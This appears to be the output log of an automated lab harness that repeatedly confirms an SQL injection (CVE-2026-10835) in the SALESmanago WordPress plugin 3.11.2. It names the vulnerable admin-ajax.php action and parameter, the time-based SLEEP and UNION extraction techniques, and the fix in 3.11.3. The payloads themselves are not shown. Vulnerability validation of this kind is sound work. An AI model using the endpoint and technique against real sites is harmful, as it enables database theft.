[*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present =================== RESULT ANALYSIS =================== Vulnerable timing: sleep0=0.072608s sleep1=6.064594s sleep2=12.011388s Vulnerable extract: baseline_count=0 union_usercount=2 union_nouser=0 (groundtruth users=2) Fixed control: sleep2 http=403 time=0.009735s ; union http=403 count= timing_scales=yes union_matches_groundtruth=yes fixed_blocked_403=yes =================== VERDICT =================== CONFIRMED: SQL injection reproduced on vulnerable 3.11.2 via real admin-ajax.php endpoint. - Time-based blind SQLi: SLEEP delay scales with N (sleep0=0.072608s, sleep1=6.064594s, sleep2=12.011388s). - Data extraction: UNION ALL injection returned count=2 matching ground-truth wp_users count=2. - Fixed 3.11.3 negative control: Subscriber blocked with HTTP 403, no injection. { "entrypoint_kind": "api_remote", "entrypoint_detail": "POST /wp-admin/admin-ajax.php action=salesmanago_export_count_contacts data=", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "docker wordpress:6.7-php8.2-apache", "mysql:8.0", "SALESmanago plugin 3.11.2" ], "timing_seconds": { "sleep0": "0.072608", "sleep1": "6.064594", "sleep2": "12.011388" }, "data_extraction": { "union_usercount": "2", "groundtruth_usercount": "2" }, "fixed_control": { "union_http_status": "403" }, "proof_artifacts": [ "logs/vulnerable/summary.csv", "logs/fixed/summary.csv", "logs/vulnerable/req_union_usercount.txt", "logs/vulnerable/req_sleep2.txt", "logs/fixed/req_union_usercount.txt", "logs/vulnerable/resp_union_usercount_raw.txt", "logs/vulnerable/groundtruth_usercount.txt" ], "notes": "Time-based blind SQLi + UNION data extraction confirmed on vulnerable 3.11.2; fixed 3.11.3 returns HTTP 403 for Subscriber." } [*] DONE — CVE-2026-10835 CONFIRMED [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present =================== RESULT ANALYSIS =================== Vulnerable timing: sleep0=0.075820s sleep1=6.071948s sleep2=12.012303s Vulnerable extract: baseline_count=0 union_usercount=2 union_nouser=0 (groundtruth users=2) Fixed control: sleep2 http=403 time=0.009891s ; union http=403 count= timing_scales=yes union_matches_groundtruth=yes fixed_blocked_403=yes =================== VERDICT =================== CONFIRMED: SQL injection reproduced on vulnerable 3.11.2 via real admin-ajax.php endpoint. - Time-based blind SQLi: SLEEP delay scales with N (sleep0=0.075820s, sleep1=6.071948s, sleep2=12.012303s). - Data extraction: UNION ALL injection returned count=2 matching ground-truth wp_users count=2. - Fixed 3.11.3 negative control: Subscriber blocked with HTTP 403, no injection. { "entrypoint_kind": "api_remote", "entrypoint_detail": "POST /wp-admin/admin-ajax.php action=salesmanago_export_count_contacts data=", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "docker wordpress:6.7-php8.2-apache", "mysql:8.0", "SALESmanago plugin 3.11.2" ], "timing_seconds": { "sleep0": "0.075820", "sleep1": "6.071948", "sleep2": "12.012303" }, "data_extraction": { "union_usercount": "2", "groundtruth_usercount": "2" }, "fixed_control": { "union_http_status": "403" }, "proof_artifacts": [ "logs/vulnerable/summary.csv", "logs/fixed/summary.csv", "logs/vulnerable/req_union_usercount.txt", "logs/vulnerable/req_sleep2.txt", "logs/fixed/req_union_usercount.txt", "logs/vulnerable/resp_union_usercount_raw.txt", "logs/vulnerable/groundtruth_usercount.txt" ], "notes": "Time-based blind SQLi + UNION data extraction confirmed on vulnerable 3.11.2; fixed 3.11.3 returns HTTP 403 for Subscriber." } [*] DONE — CVE-2026-10835 CONFIRMED [*] project_cache_context prepared=false (using bundle artifacts) [*] plugin 3.11.2 already present [*] plugin 3.11.3 already present [*] ensuring docker images present =================== RESULT ANALYSIS =================== Vulnerable timing: sleep0=0.079426s sleep1=6.076630s sleep2=12.015201s Vulnerable extract: baseline_count=0 union_usercount=2 union_nouser=0 (groundtruth users=2) Fixed control: sleep2 http=403 time=0.012079s ; union http=403 count= timing_scales=yes union_matches_groundtruth=yes fixed_blocked_403=yes =================== VERDICT =================== CONFIRMED: SQL injection reproduced on vulnerable 3.11.2 via real admin-ajax.php endpoint. - Time-based blind SQLi: SLEEP delay scales with N (sleep0=0.079426s, sleep1=6.076630s, sleep2=12.015201s). - Data extraction: UNION ALL injection returned count=2 matching ground-truth wp_users count=2. - Fixed 3.11.3 negative control: Subscriber blocked with HTTP 403, no injection. { "entrypoint_kind": "api_remote", "entrypoint_detail": "POST /wp-admin/admin-ajax.php action=salesmanago_export_count_contacts data=", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "docker wordpress:6.7-php8.2-apache", "mysql:8.0", "SALESmanago plugin 3.11.2" ], "timing_seconds": { "sleep0": "0.079426", "sleep1": "6.076630", "sleep2": "12.015201" }, "data_extraction": { "union_usercount": "2", "groundtruth_usercount": "2" }, "fixed_control": { "union_http_status": "403" }, "proof_artifacts": [ "logs/vulnerable/summary.csv", "logs/fixed/summary.csv", "logs/vulnerable/req_union_usercount.txt", "logs/vulnerable/req_sleep2.txt", "logs/fixed/req_union_usercount.txt", "logs/vulnerable/resp_union_usercount_raw.txt", "logs/vulnerable/groundtruth_usercount.txt" ], "notes": "Time-based blind SQLi + UNION data extraction confirmed on vulnerable 3.11.2; fixed 3.11.3 returns HTTP 403 for Subscriber." } [*] DONE — CVE-2026-10835 CONFIRMED